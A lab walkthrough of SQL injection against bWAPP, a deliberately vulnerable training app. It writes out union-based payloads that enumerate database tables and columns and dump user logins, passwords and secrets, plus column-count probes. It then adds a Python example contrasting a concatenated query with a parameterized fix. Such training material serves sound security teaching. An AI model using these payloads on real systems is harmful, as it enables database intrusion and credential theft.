# SQL Injection with bWAPP

## URL - [`http://192.168.31.112:8086`](http://192.168.31.112:8086)

Go to SQL Injection (GET/Search)

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsLk_UZFdE_nIsWAZb%2F-MJsSjjs6gB2KkX6JJU6%2Fimage.png?alt=media\&token=45f514cf-e727-4191-910d-937130029d94)

Let's put a `'` in and see what happens.

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsLk_UZFdE_nIsWAZb%2F-MJsRsnHyDpxGym09txv%2Fimage.png?alt=media\&token=9511c4c0-10a1-4e1b-b5dc-3a9a5b5ab909)

Let's try `' order by 6 -- -`

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsLk_UZFdE_nIsWAZb%2F-MJsSEH2X2T2F04XWO6X%2Fimage.png?alt=media\&token=705de063-e012-44c4-9905-ea4e70e90156)

Let's check whether there is a users table in bWAPP using the payload below.

```
' and 1=0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema' -- -
```

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsSuSVynPII-H5W7vp%2F-MJsU3QNHwPOlHD1MRF9%2Fimage.png?alt=media\&token=57fdf910-7885-4165-9e93-f0ffd275b8ef)

We can see that a users table exists. Let's list its columns so we can find the users.

```
' and 1=0 union all select 1,table_name, column_name,4,5,6,7 from information_schema.columns where table_schema != 'mysql' and table_schema != 'information_schema' and table_schema='bWAPP' and table_name='users' -- -
```

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsSuSVynPII-H5W7vp%2F-MJsUv6oXXbHSZhVkPzc%2Fimage.png?alt=media\&token=9996664b-dbe4-4fe0-8657-ea4b392618a8)

Now we have everything we need to retrieve all users' secrets.

```
' and 1=0 union all select 1,login,password,secret,email,admin,7 from users-- -
```

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsSuSVynPII-H5W7vp%2F-MJsVISz-Yf6G2l7BgDr%2Fimage.png?alt=media\&token=b39434a0-efe7-4f01-8282-9e2dc5c144c4)
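
Why the search query behaves this way, and the fix, as an added example (not part of the original walkthrough and not bWAPP's own code). It assumes an in-memory SQLite database as a stand-in for the lab's MySQL; the movies table layout, the sample rows and the function names are constructed for illustration.

```python
import sqlite3

# Payload quoted from the walkthrough above; everything else here is constructed.
PAYLOAD = "' and 1=0 union all select 1,login,password,secret,email,admin,7 from users-- -"

def make_db():
    # Constructed stand-in for the lab database: a 7-column movies table
    # (assumed layout) and a users table with the columns found above.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE movies (id INTEGER, title TEXT, release_year TEXT, genre TEXT,
                             main_character TEXT, imdb TEXT, tickets_stock INTEGER);
        CREATE TABLE users (id INTEGER, login TEXT, password TEXT, secret TEXT,
                            email TEXT, admin INTEGER);
        INSERT INTO movies VALUES (1, 'Iron Man', '2008', 'action', 'Tony Stark', 'tt0000000', 53);
        INSERT INTO users VALUES (1, 'alice', 'constructed-hash', 'constructed-secret',
                                  'alice@example.test', 1);
    """)
    return db

def search_vulnerable(db, title):
    # Before: user input is concatenated into the SQL text, so a quote in
    # `title` ends the string literal and the rest is parsed as SQL.
    sql = "SELECT * FROM movies WHERE title LIKE '%" + title + "%'"
    return db.execute(sql).fetchall()

def search_parameterized(db, title):
    # After: the SQL text is fixed and the input is bound as data only.
    # LIKE wildcards in the input are escaped so they match literally.
    escaped = title.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT * FROM movies WHERE title LIKE ? ESCAPE '\\'"
    return db.execute(sql, ("%" + escaped + "%",)).fetchall()

def demo():
    db = make_db()
    return {
        "vulnerable": search_vulnerable(db, PAYLOAD),        # users row comes back
        "parameterized": search_parameterized(db, PAYLOAD),  # no rows: treated as a title
        "normal": search_parameterized(db, "iron"),          # ordinary search still works
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

With the bound parameter, the whole payload is compared against movie titles as a literal string, so the `union all` never reaches the SQL parser.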

## SQL Injection (POST/Search)

Add the query below to the URL.

Using this SQL query, we can get all table schemas and names from `information_schema.tables`.

```
' and 1 = 0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where 1=0 or 1=1-- '
```

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsVjxRea7E6z99AoKU%2F-MJsXh90s211ExkSRkd6%2Fimage.png?alt=media\&token=a54887df-d8ff-4706-b477-ed082b1f5814)

Let's put a table name into the query to get that table's column names, for example the heroes table.

```
' and 1=0 union all select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name = 'heroes' and table_schema = 'bwapp'-- '
```

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsVjxRea7E6z99AoKU%2F-MJsYELBT3xPaDWNTJoK%2Fimage.png?alt=media\&token=25fb9aa4-9e7d-47d0-8902-f48cdf6fafb0)

## SQL Injection (AJAX/JSON/jQuery)

We can find the number of columns with the `order by` clause. Query: `'order by 7 -- -`

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsYbesvinfrLWtXzko%2F-MJsZ_vTMVyh1W8oe4Em%2Fimage.png?alt=media\&token=0ba442f6-4a4d-466a-a911-a7bf27974961)

Let's check with `'order by 8 -- -`

![](https://990422818-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LWGXF4oLcghA1GLq0CM%2F-MJsYbesvinfrLWtXzko%2F-MJs_6gK5fMP1ztJCq1r%2Fimage.png?alt=media\&token=4313d3ba-b82c-447e-9bf6-21149195c4ba)

With `order by 8`, nothing appeared, so we can assume that it has only 7 columns.
